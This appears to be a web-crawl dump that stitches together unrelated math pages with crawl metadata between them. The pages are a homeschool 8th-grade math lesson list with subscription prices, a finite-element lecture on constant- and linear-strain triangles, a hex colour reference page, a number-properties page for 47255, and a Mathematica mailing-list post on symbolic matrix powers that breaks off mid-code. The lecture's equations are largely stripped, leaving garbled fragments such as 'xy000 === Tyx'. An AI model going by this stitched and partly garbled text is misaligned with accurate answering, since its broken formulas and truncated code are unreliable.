Substitution\n\nEvaluate algebraic expressions and equations by substituting integral values for variables and simplifying.\n\n#### Lesson 8: Inequalities\n\nSolve linear inequalities in one variable algebraically.\n\n#### Lesson 1: Identifying the Number of Solutions in a Linear Equation\n\nIdentify the number of solutions in a linear equation.\n\n#### Lesson 2: Solving Equations with Variables on Both Sides\n\nSolve equations with variables on both sides.\n\n#### Lesson 3: Solving Equations Requiring the Distributive Property\n\nSolve equations requiring the distributive property.\n\n#### Lesson 4: Solving Equations Requiring Combining Like Terms\n\nSolve equations requiring combining like terms.\n\n#### Lesson 1: Analyzing Systems of Equations\n\nAnalyze systems of equations.\n\n#### Lesson 2: Identifying the Number of Solutions in a Linear Equation\n\nIdentify the number of solutions in a linear equation.\n\n#### Lesson 1: Geometric Properties\n\nUse properties of parallelism, perpendicularity, and symmetry to solve real world problems.\n\n#### Lesson 2: Polygons\n\nCompare and describe properties of convex and concave polygons.\n\n#### Lesson 3: Pythagorean Theorem\n\nApply the Pythagorean theorem to solve real world problems.\n\n#### Lesson 4: Congruent and Similar\n\nIdentify congruence and similarity in real world situations and justify.\n\n#### Lesson 5: Transformations\n\nIdentify and perform transformations (reflection, translation, rotation, and dilation) of a figure on a coordinate plane.\n\n#### Lesson 6: Proportional Relationships\n\nIdentify how changes in dimensions affect area and perimeter.\n\n#### Lesson 1: Transforming Lines and Line Segments\n\nTransform lines and line segments.\n\n#### Lesson 2: Transforming Angles\n\nTransform angles.\n\n#### Lesson 3: Transforming Parallel Lines\n\nTransform parallel lines.\n\n#### Lesson 4: Understanding Congruence\n\nUnderstand congruence.\n\n#### Lesson 5: Using a Sequence of Transformations\n\nUse a sequence of transformations.\n\n#### Lesson 6: Understanding Similar Figures\n\nUnderstand similar figures.\n\n#### Lesson 7: Describing Sequences of Transformations that Show Similarity\n\nDescribe sequences of transformations that show similarity.\n\n#### Lesson 1: Proving Triangle Theorems Informally\n\nProve triangle theorems informally.\n\n#### Lesson 2: Understanding Angles Formed When Parallel Lines are Cut by a Transversal\n\nUnderstand angles formed when parallel lines are cut by a transversal.\n\n#### Lesson 3: Exploring Angle-Angle Similarity\n\nExplore angle-angle similarity.\n\n#### Lesson 1: Using the Converse of the Pythagorean Theorem\n\nUse the converse of the Pythagorean theorem.\n\n#### Lesson 2: Applying the Pythagorean Theorem in Three Dimensions\n\nApply the Pythagorean theorem in three dimensions.\n\n#### Lesson 3: Applying the Pythagorean Theorem in the Coordinate Plane\n\nApply the Pythagorean theorem in the coordinate plane.\n\n#### Lesson 1: Volume\n\nFind the volume of pyramids, prisms, and cones.\n\n#### Lesson 2: Applying Volume Formulas\n\nApply volume formulas.\n\n#### Lesson 3: Surface Area\n\nFind the surface area of pyramids, prisms, and cones.\n\n#### Lesson 4: Regular and Irregular Polygons\n\nCompare regular and irregular polygons.\n\n#### Lesson 5: Angle Measure\n\nFind the angle measure in two-dimensional figures and two-dimensional sides of three-dimensional figures based on geometric relationships.\n\n#### Lesson 6: Proportional Relationships\n\nIdentify the relationship between volume or surface area and dimension.\n\n#### Lesson 1: Scale\n\nInterpret and apply various scales including number lines, graphs, models, and maps.\n\n#### Lesson 2: Estimation\n\nSelect tools to measure quantities and dimensions to a specified degree of accuracy and determine the greatest possible error of measurement.\n\n#### Lesson 3: Significant Digits\n\nIdentify the number of significant digits as related to the least precise unit of measure and apply to real world contexts.\n\n#### Lesson 1: Tables and Ordered Pairs\n\nUse a table to find ordered pair solutions of a linear equation in slope-intercept form.\n\n#### Lesson 2: Equations to Lines\n\nGraph linear equations in standard form.\n\n#### Lesson 3: Linear Inequalities\n\nIdentify and graph inequalities on a number line.\n\n#### Lesson 4: Inequalities\n\nIdentify and graph inequalities in the coordinate plane.\n\n#### Lesson 5: Applications of Linear Inequalities\n\nSolve problems in two variables using linear inequalities.\n\n#### Lesson 1: x- and y- Intercepts\n\nGiven the graph of a linear relationship, determine the x- and y- intercepts.\n\n#### Lesson 2: Slope of a Line\n\nGiven the graph of a line, determine the slope.\n\n#### Lesson 3: Write Equations in Slope-Intercept Form\n\nGiven the slope and y-intercept, write an equation.\n\n#### Lesson 4: Find a Function Rule\n\nFind a function rule to describe a linear relationship using tables of related input-output variables.\n\n#### Lesson 5: Determine if a Function is Linear\n\nUsing information from a table, graph, or rule, determine if a function is linear and justify.\n\n#### Lesson 1: Graphing Proportional Relationships and Interpreting Slope\n\nGraph proportional relationships and interpreting slope.\n\n#### Lesson 2: Using Similar Triangles to Understand Slope\n\nUse similar triangles to understand slope.\n\n#### Lesson 3: Using Slope-Intercept Form\n\nUse slope-intercept form.\n\n#### Lesson 4: Interpreting y = mx + b as a Linear Function\n\nInterpret y = mx + b as a linear function.\n\n#### Lesson 1: Recognizing Functions\n\nRecognize functions.\n\n#### Lesson 2: Comparing Functions Represented in Different Forms\n\nCompare functions represented in different forms.\n\n#### Lesson 3: Interpreting y = mx + b as a Linear Function\n\nInterpret y = mx + b as a linear function.\n\n#### Lesson 4: Constructing Linear Functions\n\nConstruct linear functions.\n\n#### Lesson 5: Describing a Functional Relationship by Analyzing a Graph\n\nDescribe a functional relationship by analyzing a graph.\n\n#### Lesson 6: Sketching Graphs of Functions\n\nSketch graphs of functions.\n\n#### Lesson 1: Conditional Probability\n\nCalculate conditional probabilities and the probabilities of dependent events.\n\n#### Lesson 2: Sampling Techniques\n\nDefine and differentiate between different types of sampling techniques.\n\n#### Lesson 3: Apply Sampling\n\nUse different types of sampling techniques to collect data.\n\n#### Lesson 4: Sample Bias\n\nIdentify whether a sample is biased.\n\n#### Lesson 1: Data Representations\n\nInterpret circle, line, bar, histogram, stem-and-leaf, and box-and-whisker graphs including how different displays lead to different interpretations.\n\n#### Lesson 2: Statistics\n\nIdentify and explain how statistics and graphs can be used in misleading ways.\n\n#### Lesson 3: Mean, Median and Mode\n\nDetermine appropriate measures of central tendency for a given situation or set of data.\n\n#### Lesson 4: Technology\n\nUse technology to determine the mean, median, mode, and range of a set of real world data.\n\n## Why Choose Time4Learning Eighth-Grade Math Homeschool Curriculum\n\nOur 8th-grade online math curriculum can be used as a main homeschool program or to supplement other curricula or school. Time4Learning’s adaptable program allows students to work across grade levels. For example, if your student is “at-level” in language arts but ahead in math, they could use the eighth-grade language arts curriculum and the suggested 9th-grade math curriculum.\n\nIf your eighth grader is struggling to prepare for high school math, Time4Learning’s curriculum can be used as a supplement to get back on track. You can use our eighth-grade math lesson plans to locate specific topics that your student needs to review. Additionally, our automated grading and recordkeeping system saves you time and helps you easily keep track of your child’s progress.\n\nPreK - 8th\n\n\\$24.95\n• Monthly, first student\n• (\\$14.95/mo for each additional PreK-8th student)\n\n9th - 12th\n\n\\$34.95\n• Monthly, per student\n• (\\$14.95/mo for each additional PreK-8th student)\n\nNow Is the Time to Get Started!\n\nStart • Stop • Pause Anytime\n\nTOP" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.86175126,"math_prob":0.944081,"size":8882,"snap":"2023-14-2023-23","text_gpt3_token_len":1658,"char_repetition_ratio":0.12739356,"word_repetition_ratio":0.08242613,"special_character_ratio":0.1739473,"punctuation_ratio":0.11914324,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9989109,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-06-04T04:02:51Z\",\"WARC-Record-ID\":\"<urn:uuid:2986adf2-6e45-4219-8412-81cf6215b682>\",\"Content-Length\":\"126791\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:282023dd-8bba-434c-85b2-6299c88be70e>\",\"WARC-Concurrent-To\":\"<urn:uuid:68148dfd-6527-4352-a680-9e183a58fc94>\",\"WARC-IP-Address\":\"172.67.21.14\",\"WARC-Target-URI\":\"https://www.time4learning.com/homeschool-curriculum/middle-school/eighth-grade/math-lesson-plans.html\",\"WARC-Payload-Digest\":\"sha1:JRCWSZLDSUVDSXS2IKPIFRB7RNZCTQGJ\",\"WARC-Block-Digest\":\"sha1:G3JZP2C45F3NIGYBEZ3FMNJXJ3AP4FY2\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-23/CC-MAIN-2023-23_segments_1685224649439.65_warc_CC-MAIN-20230604025306-20230604055306-00336.warc.gz\"}"}
https://fdocument.org/document/plane-problems-constitutive-equations-ufl-plane-problems-constitutive-equations.html
[ "• date post\n\n09-Sep-2018\n• Category\n\n## Documents\n\n• view\n\n224\n\n0\n\nEmbed Size (px)\n\n### Transcript of Plane Problems: Constitutive Equations - UFL · PDF filePlane Problems: Constitutive Equations...\n\n• 1\n\nPlane Problems: Constitutive Equations Constitutive equations for a linearly elastic and isotropic material in plane stress (i.e., z=xz=yz=0):\n\nwhere the last column has the initial (thermal) strains which are 0 , xy000 === Tyx\n\nRewriting in a compact form and solving for the stress vector,\n\nwhere\n\n• 2\n\nPlane Problems: Approximate Strain-Displacement Relations\n\nFrom the above, by definition\n\n, ,xv\n\nyu\n\nyv\n\nxu\n\nxyyx\n\n+\n\n• 3\n\nPlane Problems: Strain-Displacement Relations\n\nAs the size of the rectangle goes to zero, in the limit,\n\n• 4\n\nPlane Problems: Displacement Field Interpolated Interpolating the displacement field, u(x,y) and v(x,y), in the plane finite element from nodal displacements,\n\nwhere entries of matrix N are the shape (interpolation) functions Ni. From the previous two equations,\n\nwhere B is the strain-displacement matrix.\n\n• 5\n\nStiffness Matrix and strain energy Strain energy density of an elastic material (energy/volume)\n\nET21\n\nIntegrating over the element volume, the total strain energy is\n\n( )dEBBdE 21\n\n21\n\n== dVdVU TTT\n\nwhere the term in parantheses is identified to be the element stiffness matrix.\n\nThe strain energy then becomes\n\nwhere the term on the right is the total work done on the element.\n\n1 1 r2 2\n\nT TU = =d kd d\n\n• 6\n\nImportant Note on interpolation (shape) functions\n\nObserve that, for a given material, stiffness matrix k (and, therefore, the behavior of an element) depends solely on N, the interpolation functions, and . The latter prescribes differentiations which define strains in terms of displacements.\n\nNBEBBk == , dVT\n\nThe variation of the shape functions in the element compared toactual variations of the true displacements determines element size required for good accuracy. Low-0rder shape functions will require smaller elements than higher-order shape functions.\n\n• 7\n\nSurface tractions: distributed loads on a boundary of a structure; e.g., pressure. Body forces: loads acting on every particle of the structure; e.g., acceleration (gravitaionalor otherwise), magnetic forces.Concentrated forces and moments.\n\nBoundary conditions on various segments of the surface:\n\nA to B: free. B to C: normal traction (pressure)\n\nC to D: shear traction. D to A: zero displacements (dofs=0)\n\n• 8\n\nConstant Strain Triangle (CST)\n\nThe sequence 123 in node numbers must go counterclockwisearound the element. Linear displacement field in terms of generalized coordinates i:\n\nThen, the strains are(constant within the element!!)\n\n• 9\n\nConstant Strain Triangle (CST): Stiffness MatrixStrain-displacement relation, =Bd, for the CST element\n\nwhere 2A is twice the area of the triangle and xij=xi- xj , etc.\n\nFrom the general formula\n\nwhere t: element thickness (constant)\n\nNOTE: To represent high strain gradient will require very largenumber of small CST elements\n\ntATEBBk =\n\n• 10\n\nLinear Strain Triangle (LST)\n\nThe element has six nodes and 12 dof. Not available in Genesis!\n\n• 11\n\nLinear Strain Triangle (LST) The displacement field in terms of generalized coordinates:\n\nwhich are quadratic in x and y.\n\nThe strain field:\n\nwhich are linear in x and y.\n\nPlane Problems: Constitutive EquationsPlane Problems: Approximate Strain-Displacement RelationsPlane Problems: Strain-Displacement RelationsPlane Problems: Displacement Field InterpolatedStiffness Matrix and strain energyImportant Note on interpolation (shape) functionsLoads and Boundary ConditionsConstant Strain Triangle (CST)Constant Strain Triangle (CST): Stiffness MatrixLinear Strain Triangle (LST)Linear Strain Triangle (LST)" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.7563468,"math_prob":0.96203184,"size":3790,"snap":"2022-05-2022-21","text_gpt3_token_len":895,"char_repetition_ratio":0.16481775,"word_repetition_ratio":0.039783,"special_character_ratio":0.20422164,"punctuation_ratio":0.13808802,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9976771,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-05-23T10:54:13Z\",\"WARC-Record-ID\":\"<urn:uuid:c418120a-690d-42fa-9fe7-0fe2a8b830af>\",\"Content-Length\":\"93679\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:20ea042c-26a0-42b4-b890-14a55a436707>\",\"WARC-Concurrent-To\":\"<urn:uuid:23460956-0f29-45a6-ba42-86578719132d>\",\"WARC-IP-Address\":\"51.210.70.26\",\"WARC-Target-URI\":\"https://fdocument.org/document/plane-problems-constitutive-equations-ufl-plane-problems-constitutive-equations.html\",\"WARC-Payload-Digest\":\"sha1:PIZX5WAZPQKRCPK6UJ577DVO4ZF7X4SZ\",\"WARC-Block-Digest\":\"sha1:TKP3KDDJ5DSWRMDIGQTMFA37HUZLIIN2\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-21/CC-MAIN-2022-21_segments_1652662558015.52_warc_CC-MAIN-20220523101705-20220523131705-00586.warc.gz\"}"}
https://www.colorhexa.com/13606f
[ "# #13606f Color Information\n\nIn a RGB color space, hex #13606f is composed of 7.5% red, 37.6% green and 43.5% blue. Whereas in a CMYK color space, it is composed of 82.9% cyan, 13.5% magenta, 0% yellow and 56.5% black. It has a hue angle of 189.8 degrees, a saturation of 70.8% and a lightness of 25.5%. #13606f color hex could be obtained by blending #26c0de with #000000. Closest websafe color is: #006666.\n\n• R 7\n• G 38\n• B 44\nRGB color chart\n• C 83\n• M 14\n• Y 0\n• K 56\nCMYK color chart\n\n#13606f color description : Very dark cyan.\n\n# #13606f Color Conversion\n\nThe hexadecimal color #13606f has RGB values of R:19, G:96, B:111 and CMYK values of C:0.83, M:0.14, Y:0, K:0.56. Its decimal value is 1269871.\n\nHex triplet RGB Decimal 13606f `#13606f` 19, 96, 111 `rgb(19,96,111)` 7.5, 37.6, 43.5 `rgb(7.5%,37.6%,43.5%)` 83, 14, 0, 56 189.8°, 70.8, 25.5 `hsl(189.8,70.8%,25.5%)` 189.8°, 82.9, 43.5 006666 `#006666`\nCIE-LAB 37.209, -16.621, -14.921 7.32, 9.651, 16.515 0.219, 0.288, 9.651 37.209, 22.336, 221.915 37.209, -25.457, -18.164 31.066, -12.308, -9.773 00010011, 01100000, 01101111\n\n# Color Schemes with #13606f\n\n• #13606f\n``#13606f` `rgb(19,96,111)``\n• #6f2213\n``#6f2213` `rgb(111,34,19)``\nComplementary Color\n• #136f50\n``#136f50` `rgb(19,111,80)``\n• #13606f\n``#13606f` `rgb(19,96,111)``\n• #13326f\n``#13326f` `rgb(19,50,111)``\nAnalogous Color\n• #6f5013\n``#6f5013` `rgb(111,80,19)``\n• #13606f\n``#13606f` `rgb(19,96,111)``\n• #6f1332\n``#6f1332` `rgb(111,19,50)``\nSplit Complementary Color\n• #606f13\n``#606f13` `rgb(96,111,19)``\n• #13606f\n``#13606f` `rgb(19,96,111)``\n• #6f1360\n``#6f1360` `rgb(111,19,96)``\nTriadic Color\n• #136f22\n``#136f22` `rgb(19,111,34)``\n• #13606f\n``#13606f` `rgb(19,96,111)``\n• #6f1360\n``#6f1360` `rgb(111,19,96)``\n• #6f2213\n``#6f2213` `rgb(111,34,19)``\nTetradic Color\n• #08282e\n``#08282e` `rgb(8,40,46)``\n• #0c3a43\n``#0c3a43` `rgb(12,58,67)``\n• #0f4d59\n``#0f4d59` `rgb(15,77,89)``\n• #13606f\n``#13606f` `rgb(19,96,111)``\n• #177385\n``#177385` `rgb(23,115,133)``\n• #1a869b\n``#1a869b` `rgb(26,134,155)``\n• #1e98b0\n``#1e98b0` `rgb(30,152,176)``\nMonochromatic Color\n\n# Alternatives to #13606f\n\nBelow, you can see some colors close to #13606f. Having a set of related colors can be useful if you need an inspirational alternative to your original color choice.\n\n• #136f67\n``#136f67` `rgb(19,111,103)``\n• #136f6f\n``#136f6f` `rgb(19,111,111)``\n• #13686f\n``#13686f` `rgb(19,104,111)``\n• #13606f\n``#13606f` `rgb(19,96,111)``\n• #13586f\n``#13586f` `rgb(19,88,111)``\n• #13516f\n``#13516f` `rgb(19,81,111)``\n• #13496f\n``#13496f` `rgb(19,73,111)``\nSimilar Colors\n\n# #13606f Preview\n\nText with hexadecimal color #13606f\n\nThis text has a font color of #13606f.\n\n``<span style=\"color:#13606f;\">Text here</span>``\n#13606f background color\n\nThis paragraph has a background color of #13606f.\n\n``<p style=\"background-color:#13606f;\">Content here</p>``\n#13606f border color\n\nThis element has a border color of #13606f.\n\n``<div style=\"border:1px solid #13606f;\">Content here</div>``\nCSS codes\n``.text {color:#13606f;}``\n``.background {background-color:#13606f;}``\n``.border {border:1px solid #13606f;}``\n\n# Shades and Tints of #13606f\n\nA shade is achieved by adding black to any pure hue, while a tint is created by mixing white to any pure color. In this example, #02090b is the darkest color, while #f9fdfe is the lightest one.\n\n• #02090b\n``#02090b` `rgb(2,9,11)``\n• #05181b\n``#05181b` `rgb(5,24,27)``\n• #08262c\n``#08262c` `rgb(8,38,44)``\n• #0a353d\n``#0a353d` `rgb(10,53,61)``\n• #0d434e\n``#0d434e` `rgb(13,67,78)``\n• #10525e\n``#10525e` `rgb(16,82,94)``\n• #13606f\n``#13606f` `rgb(19,96,111)``\n• #166e80\n``#166e80` `rgb(22,110,128)``\n• #197d90\n``#197d90` `rgb(25,125,144)``\n• #1c8ba1\n``#1c8ba1` `rgb(28,139,161)``\n• #1e9ab2\n``#1e9ab2` `rgb(30,154,178)``\n• #21a8c3\n``#21a8c3` `rgb(33,168,195)``\n• #24b7d3\n``#24b7d3` `rgb(36,183,211)``\nShade Color Variation\n• #30c0dc\n``#30c0dc` `rgb(48,192,220)``\n• #41c5de\n``#41c5de` `rgb(65,197,222)``\n• #51cae1\n``#51cae1` `rgb(81,202,225)``\n• #62cfe4\n``#62cfe4` `rgb(98,207,228)``\n• #73d4e7\n``#73d4e7` `rgb(115,212,231)``\n• #84d9ea\n``#84d9ea` `rgb(132,217,234)``\n• #94deed\n``#94deed` `rgb(148,222,237)``\n• #a5e3f0\n``#a5e3f0` `rgb(165,227,240)``\n• #b6e9f2\n``#b6e9f2` `rgb(182,233,242)``\n• #c7eef5\n``#c7eef5` `rgb(199,238,245)``\n• #d7f3f8\n``#d7f3f8` `rgb(215,243,248)``\n• #e8f8fb\n``#e8f8fb` `rgb(232,248,251)``\n• #f9fdfe\n``#f9fdfe` `rgb(249,253,254)``\nTint Color Variation\n\n# Tones of #13606f\n\nA tone is produced by adding gray to any pure hue. In this case, #404242 is the less saturated color, while #046a7e is the most saturated one.\n\n• #404242\n``#404242` `rgb(64,66,66)``\n• #3b4547\n``#3b4547` `rgb(59,69,71)``\n• #36484c\n``#36484c` `rgb(54,72,76)``\n• #314c51\n``#314c51` `rgb(49,76,81)``\n• #2c4f56\n``#2c4f56` `rgb(44,79,86)``\n• #27535b\n``#27535b` `rgb(39,83,91)``\n• #225660\n``#225660` `rgb(34,86,96)``\n• #1d5965\n``#1d5965` `rgb(29,89,101)``\n• #185d6a\n``#185d6a` `rgb(24,93,106)``\n• #13606f\n``#13606f` `rgb(19,96,111)``\n• #0e6374\n``#0e6374` `rgb(14,99,116)``\n• #096779\n``#096779` `rgb(9,103,121)``\n• #046a7e\n``#046a7e` `rgb(4,106,126)``\nTone Color Variation\n\n# Color Blindness Simulator\n\nBelow, you can see how #13606f is perceived by people affected by a color vision deficiency. This can be useful if you need to ensure your color combinations are accessible to color-blind users.\n\nMonochromacy\n• Achromatopsia 0.005% of the population\n• Atypical Achromatopsia 0.001% of the population\nDichromacy\n• Protanopia 1% of men\n• Deuteranopia 1% of men\n• Tritanopia 0.001% of the population\nTrichromacy\n• Protanomaly 1% of men, 0.01% of women\n• Deuteranomaly 6% of men, 0.4% of women\n• Tritanomaly 0.01% of the population" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.5552349,"math_prob":0.8056518,"size":3689,"snap":"2021-04-2021-17","text_gpt3_token_len":1659,"char_repetition_ratio":0.12591587,"word_repetition_ratio":0.011090573,"special_character_ratio":0.56871784,"punctuation_ratio":0.23783186,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99129426,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-04-23T15:24:27Z\",\"WARC-Record-ID\":\"<urn:uuid:cd2253b1-f1c7-4dd9-830b-60b3f1336f38>\",\"Content-Length\":\"36267\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:034dfbc8-bc6e-472d-bf90-4a0a29404ca0>\",\"WARC-Concurrent-To\":\"<urn:uuid:142d6f8d-6bc8-4415-ae66-287ed85e51f7>\",\"WARC-IP-Address\":\"178.32.117.56\",\"WARC-Target-URI\":\"https://www.colorhexa.com/13606f\",\"WARC-Payload-Digest\":\"sha1:VTH77ACQYPSLKX6LY6PUYIWYUZ2WNGDX\",\"WARC-Block-Digest\":\"sha1:RIOB3XBKDDCEZUTYYF6LSRA2EHUN7UPS\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-17/CC-MAIN-2021-17_segments_1618039594808.94_warc_CC-MAIN-20210423131042-20210423161042-00102.warc.gz\"}"}
https://metanumbers.com/47255
[ "## 47255\n\n47,255 (forty-seven thousand two hundred fifty-five) is an odd five-digits composite number following 47254 and preceding 47256. In scientific notation, it is written as 4.7255 × 104. The sum of its digits is 23. It has a total of 3 prime factors and 8 positive divisors. There are 34,848 positive integers (up to 47255) that are relatively prime to 47255.\n\n## Basic properties\n\n• Is Prime? No\n• Number parity Odd\n• Number length 5\n• Sum of Digits 23\n• Digital Root 5\n\n## Name\n\nShort name 47 thousand 255 forty-seven thousand two hundred fifty-five\n\n## Notation\n\nScientific notation 4.7255 × 104 47.255 × 103\n\n## Prime Factorization of 47255\n\nPrime Factorization 5 × 13 × 727\n\nComposite number\nDistinct Factors Total Factors Radical ω(n) 3 Total number of distinct prime factors Ω(n) 3 Total number of prime factors rad(n) 47255 Product of the distinct prime numbers λ(n) -1 Returns the parity of Ω(n), such that λ(n) = (-1)Ω(n) μ(n) -1 Returns: 1, if n has an even number of prime factors (and is square free) −1, if n has an odd number of prime factors (and is square free) 0, if n has a squared prime factor Λ(n) 0 Returns log(p) if n is a power pk of any prime p (for any k >= 1), else returns 0\n\nThe prime factorization of 47,255 is 5 × 13 × 727. Since it has a total of 3 prime factors, 47,255 is a composite number.\n\n## Divisors of 47255\n\n1, 5, 13, 65, 727, 3635, 9451, 47255\n\n8 divisors\n\n Even divisors 0 8 4 4\nTotal Divisors Sum of Divisors Aliquot Sum τ(n) 8 Total number of the positive divisors of n σ(n) 61152 Sum of all the positive divisors of n s(n) 13897 Sum of the proper positive divisors of n A(n) 7644 Returns the sum of divisors (σ(n)) divided by the total number of divisors (τ(n)) G(n) 217.382 Returns the nth root of the product of n divisors H(n) 6.18197 Returns the total number of divisors (τ(n)) divided by the sum of the reciprocal of each divisors\n\nThe number 47,255 can be divided by 8 positive divisors (out of which 0 are even, and 8 are odd). The sum of these divisors (counting 47,255) is 61,152, the average is 7,644.\n\n## Other Arithmetic Functions (n = 47255)\n\n1 φ(n) n\nEuler Totient Carmichael Lambda Prime Pi φ(n) 34848 Total number of positive integers not greater than n that are coprime to n λ(n) 1452 Smallest positive number such that aλ(n) ≡ 1 (mod n) for all a coprime to n π(n) ≈ 4877 Total number of primes less than or equal to n r2(n) 0 The number of ways n can be represented as the sum of 2 squares\n\nThere are 34,848 positive integers (less than 47,255) that are coprime with 47,255. And there are approximately 4,877 prime numbers less than or equal to 47,255.\n\n## Divisibility of 47255\n\n m n mod m 2 3 4 5 6 7 8 9 1 2 3 0 5 5 7 5\n\nThe number 47,255 is divisible by 5.\n\n## Classification of 47255\n\n• Arithmetic\n• Deficient\n\n• Polite\n\n• Square Free\n\n### Other numbers\n\n• LucasCarmichael\n• Sphenic\n\n## Base conversion (47255)\n\nBase System Value\n2 Binary 1011100010010111\n3 Ternary 2101211012\n4 Quaternary 23202113\n5 Quinary 3003010\n6 Senary 1002435\n8 Octal 134227\n10 Decimal 47255\n12 Duodecimal 2341b\n20 Vigesimal 5i2f\n36 Base36 10gn\n\n## Basic calculations (n = 47255)\n\n### Multiplication\n\nn×i\n n×2 94510 141765 189020 236275\n\n### Division\n\nni\n n⁄2 23627.5 15751.7 11813.8 9451\n\n### Exponentiation\n\nni\n n2 2233035025 105522070106375 4986445422876750625 235634478458040850784375\n\n### Nth Root\n\ni√n\n 2√n 217.382 36.1534 14.7439 8.60775\n\n## 47255 as geometric shapes\n\n### Circle\n\n Diameter 94510 296912 7.01529e+09\n\n### Sphere\n\n Volume 4.4201e+14 2.80611e+10 296912\n\n### Square\n\nLength = n\n Perimeter 189020 2.23304e+09 66828.7\n\n### Cube\n\nLength = n\n Surface area 1.33982e+10 1.05522e+14 81848.1\n\n### Equilateral Triangle\n\nLength = n\n Perimeter 141765 9.66933e+08 40924\n\n### Triangular Pyramid\n\nLength = n\n Surface area 3.86773e+09 1.24359e+13 38583.5" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.6342608,"math_prob":0.98890483,"size":4543,"snap":"2020-24-2020-29","text_gpt3_token_len":1598,"char_repetition_ratio":0.11874862,"word_repetition_ratio":0.028106509,"special_character_ratio":0.45124367,"punctuation_ratio":0.0749354,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9985833,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-07-09T04:37:01Z\",\"WARC-Record-ID\":\"<urn:uuid:b4b23543-2d8c-48f8-81af-803c47537075>\",\"Content-Length\":\"48320\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:3aacceba-b419-4aa5-9ba8-424d77f7c07a>\",\"WARC-Concurrent-To\":\"<urn:uuid:395d77fc-b26c-4a99-ae2e-cf74084a4e8f>\",\"WARC-IP-Address\":\"46.105.53.190\",\"WARC-Target-URI\":\"https://metanumbers.com/47255\",\"WARC-Payload-Digest\":\"sha1:KVSKE4Y3KGD23YV2OW2BGRQHQ2JJI3JA\",\"WARC-Block-Digest\":\"sha1:CSKOJ7GGW2B2YXLOBOUNOJYSB5HIZQA3\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-29/CC-MAIN-2020-29_segments_1593655898347.42_warc_CC-MAIN-20200709034306-20200709064306-00440.warc.gz\"}"}
http://forums.wolfram.com/mathgroup/archive/2001/May/msg00327.html
[ "", null, "", null, "", null, "", null, "", null, "", null, "", null, "MatrixPower[]\n\n• To: mathgroup at smc.vnet.net\n• Subject: [mg28919] MatrixPower[]\n• From: Konstantin L Kouptsov <klk206 at nyu.edu>\n• Date: Fri, 18 May 2001 01:13:26 -0400 (EDT)\n• Organization: New York University\n• Sender: owner-wri-mathgroup at wolfram.com\n\n```Hello, Mathgroup,\n\nI needed to calculate the n-th power of a given matrix M.\nUsually it can be done with the MatrixPower[M,n] function.\nBut for the symbolic power it becomes a bit tricky.\n\nTake M={{1,1,1},{0,1,0},{1,1,1}},\nthen\nMatrixPower[M,n] gives\n{{2^(-1+n),-1+2^n,2^(-1+n)},\n{0, 1,0},\n{2^(-1+ n),-1+2^n,2^(-1+n)}}\n\nNow, if you change the matrix to\nM={{1,1,1},{0,2,0},{1,1,1}}, then the MatrixPower function\ngives an error\n\nMatrixPower::\"zvec\": \"Cannot compute MatrixPower because the\nargument has a zero eigenvector.\"\n\nwhich seems irrelevant, since the power of a square matrix always\nexist.\n\nThe reason for this error is in the way Mathematica calculates the\npower. Here is the explicit form of the used algorithm\n\n{eval, evec} = Eigensystem[M0];\ns = Transpose[evec];\nA = DiagonalMatrix[eval];\nM[n_] := s.MatrixPower[A, n].Inverse[s]\n\nwhich of course does not work if s has no inverse.\n\nTo circumvent the problem one can use the Hamilton-Cailey theorem\n(which can be found in the Korn,Korn mathematical handbook).\nThe theorem gives a recipe to calculate any function of a matrix\nusing Vandermonde matrix built on its eigenvalues and a finite\nnumber of powers of the matrix itself.\n\nBelow is the implementation of this theorem. There is one thing to watch\nout: it the matrix has equal eigenvalues, the Vandermonde matrix is\nzero, so you get indeterminate 0/0. The way the theorem can be applied\nis that you can resolve indeterminancy\nby cancelling out zeroes in numerator and denominator, as in\n\n(2-2)(7-5) 1\n__________ = _\n\n(2-2)(9-3) 3\n\nwhich must be done in mathematically correct way (remember calculus?)\n\nI used the function ReplaceEqual[] to discern the similar eigevalues\nin the following manner:\n\nReplaceEqual[{1,1,2,3,4,4,5}] gives\n\n{{1,1+i1,2,3,4,4+i2,5},{i1,i2}}\n\ni.e. shift similar eigenvalues to make them different, and at the end\ncalculate the result by setting i1,i2 to zero. This is done by the following\ncode\n\nReplaceEqual[x_List] := Module[{i = 1, a, k, ls1 = {}, ls2, s, x1},\nx1 = Sort[x]; a = First[x1]; ls2 = List[a];\nFor[k = 2, k <= Length[x1], k++,\nIf[x1[[k]] == a,\ns = ToExpression[\"i\" <> ToString[i++]];\nAppendTo[ls2, x1[[k]] + s]; AppendTo[ls1, s],\nAppendTo[ls2, x1[[k]]]; a = x1[[k]]\n]\n];\n{ls2, ls1}\n]\n\nNow the Vandermonde matrix determinant can be calculated in a rather\nefficient way\n\nVandermondeMatrix[eval_List] := Module[{x, y},\nx = Table[1, {Length[eval]}];\ny = 